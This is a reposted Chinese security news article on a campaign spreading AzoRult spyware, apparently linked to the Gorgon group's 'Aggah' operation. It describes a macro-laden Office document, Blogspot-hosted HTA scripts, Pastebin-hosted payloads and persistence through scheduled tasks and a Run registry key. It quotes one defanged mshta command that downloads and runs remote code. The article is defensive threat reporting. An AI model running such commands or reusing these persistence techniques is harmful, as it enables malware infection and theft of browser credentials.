安基網 首頁 資訊 安全報 查看內容

間諜軟件AzoRult卷土重來,幕后操縱者疑似黑客組織“蛇發女妖”

2019-10-9 21:13| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 在今年3月份,網絡安全公司Palo Alto Networks旗下情報威脅分析研究小組Unit 42公開披露了一起針對中東國家的網絡攻擊行動,并認為它與巴基斯坦黑客組織“蛇發女妖(Gorgon)”有關。這起行動被命名為“Aggah”,源 ...

在今年3月份,網絡安全公司Palo Alto Networks旗下情報威脅分析研究小組Unit 42公開披露了一起針對中東國家的網絡攻擊行動,并認為它與巴基斯坦黑客組織“蛇發女妖(Gorgon)”有關。

這起行動被命名為“Aggah”,源于攻擊者用來托管Revenge遠控木馬的Pastebin網站賬戶名(“HAGGA”)以及攻擊者用來分割發送到Revenge C2服務器的數據的字符串(“aggah”)。

圖1. HAGGA的Pastebin頁面

圖2.字符串“hagga”被用于分割發送到C2服務器的數據

近日,另一家網絡安全公司Yoroi聲稱發現了一起與“Aggah”行動似乎存在關聯的網絡攻擊行動,它們有著非常相似的感染鏈。

最大的區別在于,“Aggah”行動傳播的惡意軟件是Revenge遠控木馬,而新發現的行動傳播的是AzoRult間諜軟件。

惡意文檔分析

圖3.惡意文檔樣本信息

與“Aggah”行動一樣,新行動的感染鏈也從一份包含VBA宏代碼的惡意Office文檔開始。

在去混淆后,你會發現它調用了如下系統命令:

mshta.exe http://bit[.ly/8hsshjahassahsh

短連接“bit.ly”會將受害者重定向到“hxxps://myownteammana.blogspot[.com/p/otuego4thday.html”,一個Blogspot博客頁面,這同樣與“Aggah”行動一樣。

在該頁面的源代碼中,包含有一段將由MSHTA引擎執行JavaScript代碼。

圖4.隱藏在Blogspot頁面中的HTA腳本

圖5.經過混淆處理的HTA腳本

分析表明,該腳本是一個下載程序,用于下載托管在PasteBin上的第二階段有效載荷。與“Aggah”行動一樣,PasteBin賬戶名同樣是“hagga”。

下載的第二階段有效載荷將會終止Office套件進程,并創建一個新的注冊表項,以實現在目標系統上的持久性。

圖6.另一段經過混淆的JavaScript代碼

具體來說,第二階段有效載荷使用了三種機制來實現在目標系統上的持久性:

  • 創建一個名為“Windows Update”的新任務,每60分鐘觸發一次;
  • 創建另一個名為“Update”的任務每300分鐘觸發一次;
  • 設置注冊表項“HKCUSoftwareMicrosoftWindowsCurrentVersionRunAvastUpdate”。

圖7.用于實現持久性的代碼

代碼中的三個鏈接都指向同一個腳本,而該腳本將從Pastebin下載另外兩段用于組成一個Powershell腳本的代碼。

圖8.去混淆后的腳本

圖9.用于在合法進程中注入最終有效載荷的Powershell腳本

AzoRult有效載荷

圖10. AzoRult樣本信息

如上所述,新行動的最終有效載荷是在暗網交易市場上非常暢銷的AzoRult間諜軟件,它能夠竊取大多數主流瀏覽器(如Chromium、Firefox、Opera、Vivaldi等)保存的憑證、cookie,以及其他敏感數據。

圖11. AzoRult嘗試從瀏覽器文件中提取信息

分析表明,在這起新行動中傳播的AzoRult是一個定制版本(3.2版本),被命名為“Mana Tools”,與攻擊者使用的Blogspot博客頁面相對應。

圖12. Blogspot頁面(左);AzoRult圖標(右)

結論

在這個月的前幾天,Yoroi發現攻擊者在這起新行動中傳播的有效載荷都是AzoRult間諜軟件,但之后卻切換為了Revenge遠控木馬。

如此看來,Gorgon黑客組織的確極有可能就是這起新行動的幕后操縱者。之所以使用AzoRult,有可能是該組織準備豐富他們的“軍火庫”。

不過,這里也存在另一種可能,即一個新的黑客組織模仿了“Aggah”行動的感染鏈,試圖讓Gorgon黑客組織來背這口黑鍋。



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/i6740519293055664644/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
湖北快3 购买技巧